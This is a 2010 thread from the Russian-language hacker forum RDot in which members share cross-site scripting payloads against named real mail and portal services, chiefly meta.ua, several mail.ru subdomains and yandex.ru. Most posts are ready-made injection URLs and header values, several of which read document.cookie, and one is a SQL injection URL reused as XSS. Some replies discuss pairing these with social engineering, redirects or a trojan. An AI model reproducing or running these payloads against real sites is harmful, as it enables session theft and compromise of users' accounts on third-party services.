RDot

RDot (https://rdot.org/forum/index.php)
-   Web-среда/Web-applications (https://rdot.org/forum/forumdisplay.php?f=9)
-   -   XSS на почтовых серверах (https://rdot.org/forum/showthread.php?t=14)

Ded MustD!e 02.07.2010 20:26

XSS на почтовых серверах
 
В этой теме постим XSS только на почтовых серверах.

S0ulVortex 06.07.2010 15:30

Ну стану первооткрывателем этой темы :)
Сайт: meta.ua
Тип XSS: активная
Где: В заголовке письма при открытии
Пример:</title><script>alert('xss')</script>
Наличие </title> обязательно.
P.s Судя по пузомеркам PR 7 ТИЦ13000 думаю довольно известный почтовый сервер на украине :))
P.s.s Нашел сам, но возможно кто-то её тоже нашел и до меня :)

BlackFan 09.07.2010 10:16

http://shop.deti.mail.ru/cabinet/login/

В Referer передаем "><script>alert(1)</script>

bjong 09.07.2010 14:57

Код:

_http://wap.hero.mail.ru/rules.do?p=0&gameId="><script>alert(document.cookie)</script>

BlackFan 09.07.2010 23:04

Код:

http://wap.lordmancer.mail.ru/index.php?p=40"><script>alert(1)</script>&nid=123
http://wap.hero.mail.ru/rating.do?gameId=69&date=10-07-2010<script>alert(1)</script>
http://wap.hero.mail.ru/addmsg.do?gameId=69"><script>alert(1)</script>


Dr.TRO 10.07.2010 19:27

Цитата:

Сообщение от BlackFan (Сообщение 1832)
http://shop.deti.mail.ru/cabinet/login/

В Referer передаем "><script>alert(1)</script>

есть ли смысл в этой хсс?) если ее проводить нужно си, если пользоваться си то лучше уж вообще развести либо трояна впарить.

life_glider 10.07.2010 20:31

Цитата:

Сообщение от Dr.TRO (Сообщение 2122)
есть ли смысл в этой хсс?) если ее проводить нужно си, если пользоваться си то лучше уж вообще развести либо трояна впарить.

а редирект с нормальной страницы на страницу с данным урл? редирект куда надо.
http://wap.lordmancer.mail.ru/index.php?ma=hero-profile&heroID=80878+union+select+concat_ws%280x3a ,%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%27,user%28%29,database%28%29%29,2,3&p=27
было в sql-inj можно использовать и как xss

Dr.TRO 11.07.2010 00:28

Специально проверил создал файл на лохосте с названием "><script>alert(31337);<" (</script> не выйдет так как в название слешы запрещены) и как результат:

Цитата:

Referer: http://localhost/%22%3E%3Cscript%3Ealert(31337);%3C%22
То что я и говорил, а использовать SQL Inj как XSS это в случае если очень надо и ничего сделать неможешь больше, сначала называлось сее чудо SiXSS если не ошибаюс, а потом milw0rm'ы и аналоги с сотнями школот посоздавали этот же метод снова же но с другим названием.

Товарищ молодец что нашел, что работал, просто толку 0 от нее для нас нету.

life_glider 11.08.2010 13:13

http://www.yandex.ru/?add=28568&from=promocode
раньше можно было создать виджет указав в качестве сайта javascript:code

DontForget 31.10.2010 13:08

Давно не было пассивки на мэйл ру .
Код:

http://health.mail.ru/fitness/clubs/list?csw.rb_country_id=188&csw.name=Rdot&csw.region_ref=77&csw.networkable=1&csw.has_photos=1&csw.cf=16&csw.cf=35"><script>alert(document.cookie)</script>


Часовой пояс GMT +3, время: 02:49.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot